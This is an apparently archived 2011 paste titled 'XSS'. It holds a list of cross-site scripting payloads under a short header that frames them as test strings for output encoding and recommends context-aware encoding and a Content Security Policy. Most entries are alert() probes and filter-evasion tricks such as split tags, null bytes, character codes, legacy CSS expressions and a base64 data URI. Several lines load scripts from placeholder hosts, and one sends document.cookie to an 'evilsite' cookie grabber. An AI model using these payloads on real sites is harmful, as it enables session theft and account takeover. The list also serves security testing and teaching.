
XSS

By: a guest on Jun 27th, 2011  |  syntax: HTML  |  size: 3.99 KB  |  views: 803  |  expires: Never
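  1. /* XSS cheat list: test strings for checking output encoding and input filtering. Many entries rely on legacy browser behaviour (CSS expression(), javascript: and vbscript: URLs in image sources, LOWSRC/DYNSRC, &{} script entities), so a string that does nothing in a current browser does not show the output is encoded. The nested-tag and null-byte entries show why filters that strip or blacklist substrings are unreliable; context-aware output encoding, backed by a Content Security Policy, is the dependable control. */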
  2.  
  3.  
  4. <script>alert(1);</script>
  5.  
  6. <script>alert('XSS');</script>
  7.  
  8. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  9.  
  10. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  11.  
  12. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  13.  
  14. <script>alert(String.fromCharCode(88,83,83))</script>
  15.  
  16. <img src=foo.png onerror=alert(/xssed/) />
  17.  
  18. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  19.  
  20. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  21.  
  22. <marquee><script>alert('XSS')</script></marquee>
  23.  
  24. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  25.  
  26. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  27.  
  28. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  29.  
  30. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  31.  
  32. "><script>alert(0)</script>
  33.  
  34. <script src=http://yoursite.com/your_files.js></script>
  35.  
  36. </title><script>alert(/xss/)</script>
  37.  
  38. </textarea><script>alert(/xss/)</script>
  39.  
  40. <IMG LOWSRC=\"javascript:alert('XSS')\">
  41.  
  42. <IMG DYNSRC=\"javascript:alert('XSS')\">
  43.  
  44. <font style='color:expression(alert(document.cookie))'>
  45.  
  46. '); alert('XSS
  47.  
  48. <img src="javascript:alert('XSS')">
  49.  
  50. <script language="JavaScript">alert('XSS')</script>
  51.  
  52. [url=javascript:alert('XSS');]click me[/url]
  53.  
  54. <body onunload="javascript:alert('XSS');">
  55.  
  56. <body onLoad="alert('XSS');"
  57.  
  58. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  59. "/></a></><img src=1.gif onerror=alert(1)>
  60.  
  61. window.alert("Bonjour !");
  62.  
  63. <div style="x:expression((window.r==1)?'':eval('r=1;
  64. alert(String.fromCharCode(88,83,83));'))">
  65.  
  66. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  67.  
  68. "><script alert(String.fromCharCode(88,83,83))</script>
  69.  
  70. '>><marquee><h1>XSS</h1></marquee>
  71.  
  72. '">><script>alert('XSS')</script>
  73.  
  74. '">><marquee><h1>XSS</h1></marquee>
  75.  
  76. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  77.  
  78. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  79.  
  80. <script>var var = 1; alert(var)</script>
  81.  
  82. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  83.  
  84. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  85.  
  86. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  87.  
  88. " onfocus=alert(document.domain) "> <"
  89. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  90.  
  91. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  92.  
  93. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  94.  
  95. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  96.  
  97. <br size=\"&{alert('XSS')}\">
  98.  
  99. <scrscriptipt>alert(1)</scrscriptipt>
  100.  
  101. </br style=a:expression(alert())>
  102.  
  103. </script><script>alert(1)</script>
  104.  
  105. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  106.  
  107. [color=red width=expression(alert(123))][color]
  108.  
  109. <BASE HREF="javascript:alert('XSS');//">
  110.  
  111. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  112.  
  113. "></iframe><script>alert(123)</script>
  114.  
  115. <body onLoad="while(true) alert('XSS');">
  116.  
  117. '"></title><script>alert(1111)</script>
  118.  
  119. </textarea>'"><script>alert(document.cookie)</script>
  120.  
  121. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  122.  
  123. </script></script><<<<script><>>>><<<script>alert(123)</script>
  124.  
  125. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  126.  
  127. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  128.  
  129. '></select><script>alert(123)</script>
  130.  
  131. '>"><script src = 'http://www.site.com/XSS.js'></script>
  132.  
  133. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  134.  
  135. <SCRIPT>document.write("XSS");</SCRIPT>
  136.  
  137. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  138.  
  139. ='><script>alert("xss")</script>
  140.  
  141. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  142.  
  143. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  144.  
  145. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  146.  
  147. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  148.  
  149. src="http://www.site.com/XSS.js"></script>
  150.  
  151. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=